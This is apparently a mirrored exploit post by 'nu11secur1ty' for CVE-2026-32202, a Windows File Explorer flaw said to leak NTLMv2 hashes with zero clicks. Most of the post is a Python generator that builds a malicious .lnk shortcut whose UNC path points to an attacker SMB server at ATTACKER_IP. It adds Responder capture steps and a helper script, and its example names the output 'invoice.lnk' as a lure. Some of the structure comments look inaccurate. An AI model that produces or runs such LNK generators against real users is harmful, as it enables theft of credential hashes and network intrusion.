Share
## https://sploitus.com/exploit?id=PACKETSTORM:222045
# Titles: CVE-2026-32202 - Windows Shell LNK Spoofing to NTLMv2 Hash Capture
    # Author: nu11secur1ty
    # Date: 2026-05-27
    # Vendor: Microsoft
    # Software: Windows Shell (File Explorer)
    # Reference: https://nvd.nist.gov/vuln/detail/CVE-2026-32202
    
    ## Description:
    A spoofing vulnerability in Windows Shell (File Explorer) allows an
    attacker to capture NTLMv2 hashes without user interaction. By crafting a
    malicious .lnk (shortcut) file with a UNC path pointing to an
    attacker-controlled SMB server, the target's Windows system automatically
    sends an NTLMv2 authentication request when the folder containing the .lnk
    file is opened. No click on the shortcut is required โ€“ simply viewing the
    folder triggers the vulnerability.
    
    **CVSS**: 4.3 (Medium) โ€“ NetNTLMv2 hash leak
    **Attack Vector**: Network (SMB)
    **Privileges Required**: None (user only needs to open a folder)
    **User Interaction**: None (zero-click)
    
    **Affected Versions**:
    - Windows 11 23H2, 24H2, 25H2, 26H1
    - Windows 10 21H2-22H2
    - Windows Server 2019/2022/2025
    
    **Patch**: Microsoft April 2026 Patch Tuesday (KB2026-04214)
    
    STATUS: MEDIUM - HIGH/ Vulnerability
    
    [+]Payload:
    
    ```POST
    SMB/CIFS NTLMv2 Authentication Request
    UNC Path: \\ATTACKER_IP\share\payload.dll
    Protocol: SMB2 (port 445)
    Hash Type: NetNTLMv2
    ```
    [+]Exploit:
    
    ```
    #!/usr/bin/env python3
    """
    CVE-2026-32202 LNK Exploit Generator
    Author: nu11secur1ty
    Generates LNK file that leaks NTLM hash to Responder/Impacket
    """
    
    import struct
    import sys
    import os
    
    def create_malicious_lnk(attacker_ip, output_file="exploit.lnk",
    share_name="share"):
        """
        Creates LNK file with UNC path to attacker machine
        """
    
        unc_path = f"\\\\{attacker_ip}\\{share_name}\\test"
        unc_utf16 = unc_path.encode('utf-16le') + b'\x00\x00'
    
        # LNK structure (standard + vulnerable component)
        lnk = bytearray()
    
        # ===== HEADER (76 bytes) =====
        lnk.extend(struct.pack('<I', 0x0000004C))  # HeaderSize
        # LinkCLSID: {00021401-0000-0000-C000-000000000046}
    
    lnk.extend(b'\x01\x14\x02\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46')
        lnk.extend(struct.pack('<I', 0x000002A3))  # LinkFlags
    (HasName|HasWorkingDir|HasArguments|IsUnicode)
        lnk.extend(struct.pack('<I', 0x00000080))  # FileAttributes (NORMAL)
        lnk.extend(struct.pack('<Q', 0))           # CreationTime
        lnk.extend(struct.pack('<Q', 0))           # AccessTime
        lnk.extend(struct.pack('<Q', 0))           # WriteTime
        lnk.extend(struct.pack('<I', 0x00001000))  # FileSize
        lnk.extend(struct.pack('<I', 0x00000000))  # IconIndex
        lnk.extend(struct.pack('<I', 0x00000001))  # ShowCommand (SW_NORMAL)
        lnk.extend(struct.pack('<H', 0x0000))      # Hotkey
        lnk.extend(b'\x00\x00')                    # Reserved
        lnk.extend(b'\x00\x00\x00\x00')            # Reserved2
        lnk.extend(b'\x00\x00\x00\x00')            # Reserved3
    
        # ===== IDLIST (activates when folder is opened) =====
        # Shell Folder IDITEM
        lnk.extend(b'\x14\x00')                    # ItemID size (20 bytes)
    
    lnk.extend(b'\x2e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00')
        lnk.extend(b'\x00\x00')                    # Terminating ID
    
        # ===== STRING DATA (CRITICAL FOR EXPLOIT) =====
        # NameString (UNC path - triggers NTLM hash leak)
        lnk.extend(struct.pack('<H', len(unc_utf16)))
        lnk.extend(unc_utf16)
    
        # ArgumentsString (empty)
        lnk.extend(b'\x00\x00')
    
        # WorkingDir (UNC path again)
        lnk.extend(struct.pack('<H', len(unc_utf16)))
        lnk.extend(unc_utf16)
    
        # ===== Console Properties (required for some Windows versions) =====
        lnk.extend(b'\x50\x00\x14\x00')           # dwWindowSize (80x20)
        lnk.extend(b'\x50\x00\xfa\x00')           # dwBufferSize (80x250)
        lnk.extend(b'\x00\x00\x00\x00')           # dwFontSize
        lnk.extend(b'\x00\x00\x00\x00')           # dwFontFamily
        lnk.extend(b'\x00\x00\x00\x00')           # dwFaceNameLen
        lnk.extend(b'\x00\x00\x00\x00')           # dwFaceNameOffset
        lnk.extend(b'\x00\x00\x00\x00')           # dwStyle
        # 64 bytes padding
        lnk.extend(b'\x00' * 64)
    
        # Save the file
        with open(output_file, 'wb') as f:
            f.write(lnk)
    
        return output_file, unc_path
    
    def main():
        print(r"""
        โ•”โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•—
        โ•‘  CVE-2026-32202 - LNK Generator           โ•‘
        โ•‘  Author: nu11secur1ty                     โ•‘
        โ•šโ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•
        """)
    
        if len(sys.argv) < 2:
            print("Usage: python3 cve_2026_32202_gen.py <ATTACKER_IP>
    [output_file]")
            print("Example: python3 cve_2026_32202_gen.py 192.168.1.100
    invoice.lnk")
            sys.exit(1)
    
        attacker_ip = sys.argv[1]
        output_file = sys.argv[2] if len(sys.argv) > 2 else "exploit.lnk"
    
        lnk_file, unc_path = create_malicious_lnk(attacker_ip, output_file)
    
        print(f"[+] Exploit ready!")
        print(f"[+] File: {lnk_file}")
        print(f"[+] UNC path: {unc_path}")
        print()
        print("[*] Next steps:")
        print(f"    1. Start Responder: sudo responder -I eth0 -v")
        print(f"    2. Transfer {lnk_file} to Windows 11 Desktop")
        print(f"    3. Open Desktop in File Explorer (no click required)")
        print(f"    4. Watch Responder - NTLM hash will appear")
        print()
    
        with open("start_responder.sh", "w") as f:
            f.write("#!/bin/bash\n")
            f.write("echo \"[+] Starting Responder...\"\n")
            f.write("sudo responder -I eth0 -v\n")
        os.chmod("start_responder.sh", 0o755)
        print("[+] Helper script created: start_responder.sh")
    
    if __name__ == "__main__":
        main()
    ```
    
    
    Demo:
    [href](https://www.patreon.com/posts/cve-2026-32202-159362448)
    
    Code:
    [code](
    https://github.com/nu11secur1ty/CVE-mitre/tree/main/2026/CVE-2026-32202)
    
    Time spent:
    02:30:00
    
    --